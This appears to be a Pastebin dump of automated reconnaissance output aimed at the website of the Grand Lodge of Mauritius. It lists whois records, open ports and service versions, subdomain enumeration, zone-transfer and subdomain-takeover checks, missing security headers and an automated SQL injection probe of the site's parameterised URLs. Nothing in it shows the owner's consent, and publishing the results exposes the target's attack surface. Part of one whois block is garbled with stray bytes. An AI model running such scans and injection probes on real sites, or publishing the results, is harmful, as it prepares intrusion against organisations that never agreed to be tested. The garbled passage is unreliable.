Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname www.glmasonica.com ISP Savvis (AS3561)
- Continent North America Flag
- US
- Country United States Country Code US (USA)
- Region MA Local time 15 Apr 2018 21:43 EDT
- Metropolis* Boston Postal Code 02451
- City Waltham Latitude 42.403
- IP Address 192.252.149.45 Longitude -71.259
- #######################################################################################################################################
- HostIP:192.252.149.45
- HostName:glmasonica.com
- Gathered Inet-whois information for 192.252.149.45
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 192.251.231.0 - 192.255.255.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- mnt-routes: RIPE-NCC-RPSL-MNT
- created: 2018-03-02T09:54:33Z
- last-modified: 2018-03-02T09:54:33Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.91.1 (WAGYU)
- Gathered Inic-whois information for glmasonica.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain Name: GLMASONICA.COM
- Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.enom.com
- Registrar URL: http://www.enom.com
- Updated Date: 2018-02-09T11:03:06Z
- Creation Date: 2011-02-11T08:34:04Z
- Registry Expiry Date: 2019-02-11T08:34:04Z
- Registrar: eNom, Inc.
- Registrar IANA ID: 48
- Registrar Abuse Contact Email:
- Registrar Abuse Contact Phone:
- Domain Status: clientTransferProhibited https�U@ed
- Name Server: NS1.SERVER308.COM
- Name Server: NS2.SERVER308.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-04-16T01:46:24Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not neceYV@ssariFZA�ly# refle8�'K�ctXV@ the E�'K�exgV@pirat��������ion
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access o�U@query�]A� o0ur Who��'K�isU@
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois qu�U@you a�]A�gr�ee to ��'K�abU@ide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this �U@Data �]A�is� expre7�'K�ssU@ly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these ter�U@ms of�]A� use. Ver̷'K�iSU@ign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Gathered Netcraft information for glmasonica.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for glmasonica.com
- Netcraft.com Information gathered
- Gathered Subdomain information for glmasonica.com
- --------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- HostName:www.glmasonica.com
- HostIP:192.252.149.45
- Searching Altavista.com:80...
- Found 1 possible subdomain(s) for host glmasonica.com, Searched 0 pages containing 0 results
- Gathered E-Mail information for glmasonica.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host glmasonica.com, Searched 0 pages containing 0 results
- Gathered TCP Port information for 192.252.149.45
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 80/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 0 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://glmasonica.com
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Grande Loge De Maurice
- [+] IP address: 192.252.149.45
- [+] Web Server: Apache
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- W H O I S L O O K U P
- =======================================================================================================================================
- Domain Name: GLMASONICA.COM
- Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.enom.com
- Registrar URL: http://www.enom.com
- Updated Date: 2018-02-09T11:03:06Z
- Creation Date: 2011-02-11T08:34:04Z
- Registry Expiry Date: 2019-02-11T08:34:04Z
- Registrar: eNom, Inc.
- Registrar IANA ID: 48
- Registrar Abuse Contact Email:
- Registrar Abuse Contact Phone:
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Name Server: NS1.SERVER308.COM
- Name Server: NS2.SERVER308.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-04-16T01:46:24Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 192.252.149.45
- [i] Country: US
- [i] State: Massachusetts
- [i] City: Waltham
- [i] Latitude: 42.403000
- [i] Longitude: -71.259003
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Mon, 16 Apr 2018 01:46:40 GMT
- [i] Server: Apache
- [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
- [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- [i] Pragma: no-cache
- [i] Set-Cookie: projector=13fe947520f28f594bf9d7e975093f0c; path=/
- [i] Connection: close
- [i] Content-Type: text/html
- D N S L O O K U P
- =======================================================================================================================================
- ;; Truncated, retrying in TCP mode.
- glmasonica.com. 2560 IN SOA ns1.server308.com. hostmaster.glmasonica.com. 1523828373 16384 2048 1048576 2560
- glmasonica.com. 25920 IN NS ns1.server308.com.
- glmasonica.com. 25920 IN NS ns2.server308.com.
- glmasonica.com. 14400 IN MX 0 mail.glmasonica.com.
- glmasonica.com. 14400 IN A 192.252.149.45
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 192.252.149.45
- Network = 192.252.149.45 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 192.252.149.45 - 192.252.149.45 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.01 ( https://nmap.org ) at 2018-04-16 01:46 UTC
- Nmap scan report for glmasonica.com (192.252.149.45)
- Host is up (0.015s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
- 23/tcp filtered telnet
- 25/tcp open smtp netqmail smtpd 1.04
- 80/tcp open http Apache httpd
- 110/tcp open pop3 Dovecot pop3d
- 143/tcp open imap Dovecot imapd
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- Service Info: Host: 192.252.149.45; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds
- #######################################################################################################################################
- <pre><font color="#FCE94F"><b>[!]</b></font> IP Address : 192.252.149.45
- <font color="#FCE94F"><b>[!]</b></font> Server: Apache
- <font color="#8AE234"><b>[+]</b></font> Clickjacking protection is not in place.
- <font color="#8AE234"><b>[+]</b></font> Operating System : Debian&#34;
- },
- &#34;993&#34;: {
- &#34;imaps&#34;: {
- &#34;tls&#34;: {
- &#34;tls&#34;: {
- &#34;server_key_exchange&#34;: {
- &#34;ecdh_params&#34;: {
- &#34;curve_id&#34;: {
- &#34;id&#34;: 23,
- &#34;name&#34;: &#34;secp256r1&#34;
- }
- }
- },
- &#34;certificate&#34;: {
- &#34;parsed&#34;: {
- &#34;fingerprint_sha1&#34;: &#34;5e5415f6edece4cb2c1913c05b07a33a89fbb4d0&#34;,
- &#34;tbs_noct_fingerprint&#34;: &#34;cab5cdc850c8153ea3bc4a1b31f2d48b54af1dfd6f4228c1233652effbba14a9&#34;,
- &#34;subj
- <font color="#FCE94F"><b>[!]</b></font> www.glmasonica.com doesn't seem to use a CMS
- <font color="#8AE234"><b>[+]</b></font> Honeypot Probabilty: 30%
- <font color="#EF2929"><b>----------------------------------------</b></font>
- <font color="#EEEEEC"><b>[~]</b></font> Trying to gather whois information for www.glmasonica.com
- <font color="#8AE234"><b>[+]</b></font> Whois information found
- <font color="#EF2929"><b>[-]</b></font> Unable to build response, visit https://who.is/whois/www.glmasonica.com
- <font color="#EF2929"><b>----------------------------------------</b></font>
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
- 23/tcp filtered telnet
- 25/tcp open smtp netqmail smtpd 1.04
- 80/tcp open http Apache httpd
- 110/tcp open pop3 Dovecot pop3d
- 143/tcp open imap Dovecot imapd
- 443/tcp open ssl/http Apache httpd
- 445/tcp filtered microsoft-ds
- 3389/tcp filtered ms-wbt-server
- <font color="#EF2929"><b>----------------------------------------</b></font>
- <font color="#8AE234"><b>[+]</b></font> DNS Records
- <font color="#8AE234"><b>[+]</b></font> Host Records (A)
- www.glmasonica.comHTTP: (192.252.149.45) AS3561 Savvis United States
- <font color="#8AE234"><b>[+]</b></font> TXT Records
- <font color="#8AE234"><b>[+]</b></font> DNS Map: https://dnsdumpster.com/static/map/glmasonica.com.png
- <font color="#EEEEEC"><b>[>]</b></font> Initiating 3 intel modules
- <font color="#EEEEEC"><b>[>]</b></font> Loading Alpha module (1/3)
- <font color="#EEEEEC"><b>[>]</b></font> Beta module deployed (2/3)
- <font color="#EEEEEC"><b>[>]</b></font> Gamma module initiated (3/3)
- [+] Emails found:
- ------------------
- pixel-1523843228738161-web-@www.glmasonica.com
- pixel-1523843231359027-web-@www.glmasonica.com
- No hosts found
- [+] Virtual hosts:
- -----------------
- <font color="#EEEEEC"><b>[~]</b></font> Crawling the target for fuzzable URLs
- <font color="#8AE234"><b>[+]</b></font> Found 2 fuzzable URLs
- http://www.glmasonica.com//introduction.php?l=fr
- <font color="#EEEEEC"><b>[~]</b></font> Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
- <font color="#EF2929"><b>[-]</b></font> None of parameters is vulnerable to SQL injection
- <font color="#8AE234"><b>[+]</b></font> These are the URLs having parameters:
- http://www.glmasonica.com//introduction.php?l=fr
- http://www.glmasonica.com//introduction.php?l=en
- </pre>
- #######################################################################################################################################
- [*] Processing domain glmasonica.com
- [+] Getting nameservers
- 192.252.150.21 - ns2.server308.com
- 192.252.149.21 - ns1.server308.com
- [-] Zone transfer failed
- [+] MX records found, added to target list
- 0 mail.glmasonica.com.
- [+] Wildcard domain found - 192.252.149.45
- [*] Scanning glmasonica.com for A records
- #######################################################################################################################################
- Original* glmasonica.com 192.252.149.45 NS:ns1.server308.com MX:mail.glmasonica.com
- Subdomain gl.masonica.com 207.148.248.143
- Subdomain glm.asonica.com 66.96.132.120
- Subdomain glma.sonica.com 208.91.197.27
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 192.252.149.45 400 host ftp_.glmasonica.com Apache
- 192.252.149.45 host mta.glmasonica.com
- 192.252.149.45 host mtu.glmasonica.com
- 192.252.149.45 host mu.glmasonica.com
- 192.252.149.45 host multimedia.glmasonica.com
- 192.252.149.45 host music.glmasonica.com
- 192.252.149.45 host mv.glmasonica.com
- 192.252.149.45 host mw.glmasonica.com
- 192.252.149.45 host mx.glmasonica.com
- 192.252.149.45 host mx1.glmasonica.com
- 192.252.149.45 host my.glmasonica.com
- 192.252.149.45 host mysql.glmasonica.com
- 192.252.149.45 host mysql0.glmasonica.com
- 192.252.149.45 host mysql01.glmasonica.com
- 192.252.149.45 400 host ns_.glmasonica.com Apache
- 192.252.149.45 host problemtracker.glmasonica.com
- 192.252.149.45 host products.glmasonica.com
- 192.252.149.45 host profiles.glmasonica.com
- 192.252.149.45 host project.glmasonica.com
- 192.252.149.45 host projects.glmasonica.com
- 192.252.149.45 host promo.glmasonica.com
- 192.252.149.45 host prueba.glmasonica.com
- 192.252.149.45 host pruebas.glmasonica.com
- 192.252.149.45 host ps.glmasonica.com
- 192.252.149.45 host psi.glmasonica.com
- 192.252.149.45 host pss.glmasonica.com
- 192.252.149.45 host pt.glmasonica.com
- 192.252.149.45 host pub.glmasonica.com
- 192.252.149.45 host public.glmasonica.com
- 192.252.149.45 host pubs.glmasonica.com
- 192.252.149.45 host purple.glmasonica.com
- 192.252.149.45 host read.glmasonica.com
- 192.252.149.45 host realserver.glmasonica.com
- 192.252.149.45 host recruiting.glmasonica.com
- 192.252.149.45 host red.glmasonica.com
- 192.252.149.45 host redhat.glmasonica.com
- 192.252.149.45 host ref.glmasonica.com
- 192.252.149.45 host reference.glmasonica.com
- 192.252.149.45 host reg.glmasonica.com
- 192.252.149.45 host register.glmasonica.com
- 192.252.149.45 host rtr.glmasonica.com
- 192.252.149.45 host rtr1.glmasonica.com
- 192.252.149.45 host ru.glmasonica.com
- 192.252.149.45 host s1.glmasonica.com
- 192.252.149.45 host s2.glmasonica.com
- 192.252.149.45 host sa.glmasonica.com
- 192.252.149.45 host sac.glmasonica.com
- 192.252.149.45 host sacramento.glmasonica.com
- 192.252.149.45 302 host webmail.glmasonica.com Apache
- 192.252.149.45 200 host www.glmasonica.com Apache
- 192.252.149.45 400 host www_.glmasonica.com Apache
- ######################################################################################################################################
- -------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 192.252.149.45
- + Target Hostname: glmasonica.com
- + Target Port: 80
- + Start Time: 2018-04-15 22:09:38 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache
- + Cookie projector created without the httponly flag
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'tcn' found, with contents: choice
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + ERROR: Error limit (20) reached for host, giving up. Last error:
- + Scan terminated: 0 error(s) and 6 item(s) reported on remote host
- + End Time: 2018-04-15 22:23:52 (GMT-4) (854 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + 1 host(s) tested
- #######################################################################################################################################
- Server: 10.211.254.254
- Address: 10.211.254.254#53
- Non-authoritative answer:
- Name: glmasonica.com
- Address: 192.252.149.45
- glmasonica.com has address 192.252.149.45
- glmasonica.com mail is handled by 0 mail.glmasonica.com.
- #######################################################################################################################################
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is glmasonica.com
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 192.252.149.45. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 192.252.149.45. Module test failed
- [-] No distance calculation. 192.252.149.45 appears to be dead or no ports known
- [+] Host: 192.252.149.45 is up (Guess probability: 50%)
- [+] Target: 192.252.149.45 is alive. Round-Trip Time: 0.47967 sec
- [+] Selected safe Round-Trip Time value is: 0.95934 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [+] Primary guess:
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Other guesses:
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Host 192.252.149.45 Running OS: (Guess probability: 91%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- #######################################################################################################################################
- Domain Name: GLMASONICA.COM
- Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.enom.com
- Registrar URL: http://www.enom.com
- Updated Date: 2018-02-09T11:03:06Z
- Creation Date: 2011-02-11T08:34:04Z
- Registry Expiry Date: 2019-02-11T08:34:04Z
- Registrar: eNom, Inc.
- Registrar IANA ID: 48
- Registrar Abuse Contact Email:
- Registrar Abuse Contact Phone:
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Name Server: NS1.SERVER308.COM
- Name Server: NS2.SERVER308.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-04-16T02:31:28Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Domain Name: GLMASONICA.COM
- Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.enom.com
- Registrar URL: www.enom.com
- Updated Date: 2018-02-06T04:16:52.00Z
- Creation Date: 2011-02-11T08:34:00.00Z
- Registrar Registration Expiration Date: 2019-02-11T08:34:04.00Z
- Registrar: ENOM, INC.
- Registrar IANA ID: 48
- Reseller: SURESUPPORT.COM
- Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
- Registry Registrant ID:
- Registrant Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
- Registrant Organization: GRAND LODGE OF MAURITIUS
- Registrant Street: BARACHOIS ESTATE
- Registrant Street: NA
- Registrant City: TAMARIN
- Registrant State/Province: NA
- Registrant Postal Code: 0000
- Registrant Country: MU
- Registrant Phone: +230.4834439
- Registrant Phone Ext:
- Registrant Fax:
- Registrant Fax Ext:
- Registrant Email: INFO@IMSMAURITIUS.COM
- Registry Admin ID:
- Admin Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
- Admin Organization: GRAND LODGE OF MAURITIUS
- Admin Street: BARACHOIS ESTATE
- Admin Street: NA
- Admin City: TAMARIN
- Admin State/Province: NA
- Admin Postal Code: 0000
- Admin Country: MU
- Admin Phone: +230.4834439
- Admin Phone Ext:
- Admin Fax:
- Admin Fax Ext:
- Admin Email: INFO@IMSMAURITIUS.COM
- Registry Tech ID:
- Tech Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
- Tech Organization: GRAND LODGE OF MAURITIUS
- Tech Street: BARACHOIS ESTATE
- Tech Street: NA
- Tech City: TAMARIN
- Tech State/Province: NA
- Tech Postal Code: 0000
- Tech Country: MU
- Tech Phone: +230.4834439
- Tech Phone Ext:
- Tech Fax:
- Tech Fax Ext:
- Tech Email: INFO@IMSMAURITIUS.COM
- Name Server: NS1.SERVER308.COM
- Name Server: NS2.SERVER308.COM
- DNSSEC: unSigned
- Registrar Abuse Contact Email: abuse@enom.com
- Registrar Abuse Contact Phone: +1.4259744689
- URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
- >>> Last update of WHOIS database: 2018-02-06T04:16:52.00Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- The data in this whois database is provided to you for information
- purposes only, that is, to assist you in obtaining information about or
- related to a domain name registration record. We make this information
- available "as is," and do not guarantee its accuracy. By submitting a
- whois query, you agree that you will use this data only for lawful
- purposes and that, under no circumstances will you use this data to: (1)
- enable high volume, automated, electronic processes that stress or load
- this whois database system providing you this information; or (2) allow,
- enable, or otherwise support the transmission of mass unsolicited,
- commercial advertising or solicitations via direct mail, electronic
- mail, or by telephone. The compilation, repackaging, dissemination or
- other use of this data is expressly prohibited without prior written
- consent from us.
- We reserve the right to modify these terms at any time. By submitting
- this query, you agree to abide by these terms.
- Version 6.3 4/3/2002
- Get Noticed on the Internet! Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com
- #######################################################################################################################################
- ; <<>> DiG 9.11.3-1-Debian <<>> -x glmasonica.com
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42747
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;com.glmasonica.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 604 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2018013344 1800 900 604800 3600
- ;; Query time: 404 msec
- ;; SERVER: 10.211.254.254#53(10.211.254.254)
- ;; WHEN: Sun Apr 15 22:31:47 EDT 2018
- ;; MSG SIZE rcvd: 124
- dnsenum VERSION:1.2.4
- ----- glmasonica.com -----
- Host's addresses:
- __________________
- glmasonica.com. 11683 IN A 192.252.149.45
- Wildcard detection using: nzifomoigzmu
- _______________________________________
- nzifomoigzmu.glmasonica.com. 14400 IN A 192.252.149.45
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Wildcards detected, all subdomains will point to the same IP address
- Omitting results containing 192.252.149.45.
- Maybe you are using OpenDNS servers.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Name Servers:
- ______________
- ns2.server308.com. 12328 IN A 192.252.150.21
- ns1.server308.com. 12329 IN A 192.252.149.21
- Mail (MX) Servers:
- ___________________
- mail.glmasonica.com. 12352 IN A 192.252.149.45
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for glmasonica.com on ns2.server308.com ...
- Trying Zone Transfer for glmasonica.com on ns1.server308.com ...
- brute force file not specified, bay.
- ######################################################################################################################################
- [-] Enumerating subdomains now for glmasonica.com
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- Virustotal: mail.glmasonica.com
- Virustotal: www.glmasonica.com
- DNSdumpster: mail.glmasonica.com
- Yahoo: www.glmasonica.com
- [-] Saving results to file: /usr/share/sniper/loot/glmasonica.com/domains/domains-glmasonica.com.txt
- [-] Total Unique Subdomains Found: 2
- www.glmasonica.com
- mail.glmasonica.com
- #######################################################################################################################################
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ discover v0.5.0 - by @michenriksen
- Identifying nameservers for glmasonica.com... Done
- Using nameservers:
- - 192.252.149.21
- - 192.252.150.21
- Checking for wildcard DNS... Wildcard detected!
- Identifying wildcard IPs... Done
- Filtering out hosts resolving to wildcard IPs
- Running collector: HackerTarget... Done (1 host)
- Running collector: Shodan... Skipped
- -> Key 'shodan' has not been set
- Running collector: Wayback Machine... Done (2 hosts)
- Running collector: Riddler... Skipped
- -> Key 'riddler_username' has not been set
- Running collector: Certificate Search... Done (0 hosts)
- Running collector: Google Transparency Report... Done (0 hosts)
- Running collector: PTRArchive... Error
- -> PTRArchive returned unexpected response code: 502
- Running collector: Censys... Skipped
- -> Key 'censys_secret' has not been set
- Running collector: PassiveTotal... Skipped
- -> Key 'passivetotal_key' has not been set
- Running collector: VirusTotal... Skipped
- -> Key 'virustotal' has not been set
- Running collector: Netcraft... Done (0 hosts)
- Running collector: Threat Crowd... Done (0 hosts)
- Running collector: Dictionary... Done (26 hosts)
- Running collector: PublicWWW... Done (2 hosts)
- Running collector: DNSDB... Done (2 hosts)
- Resolving 30 unique hosts...
- Wrote 0 hosts to:
- - file:///root/aquatone/glmasonica.com/hosts.txt
- - file:///root/aquatone/glmasonica.com/hosts.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ takeover v0.5.0 - by @michenriksen
- Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json
- Loaded 25 domain takeover detectors
- Identifying nameservers for glmasonica.com... Done
- Using nameservers:
- - 192.252.150.21
- - 192.252.149.21
- Checking hosts for domain takeover vulnerabilities...
- Finished checking hosts:
- - Vulnerable : 0
- - Not Vulnerable : 0
- Wrote 0 potential subdomain takeovers to:
- - file:///root/aquatone/glmasonica.com/takeovers.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
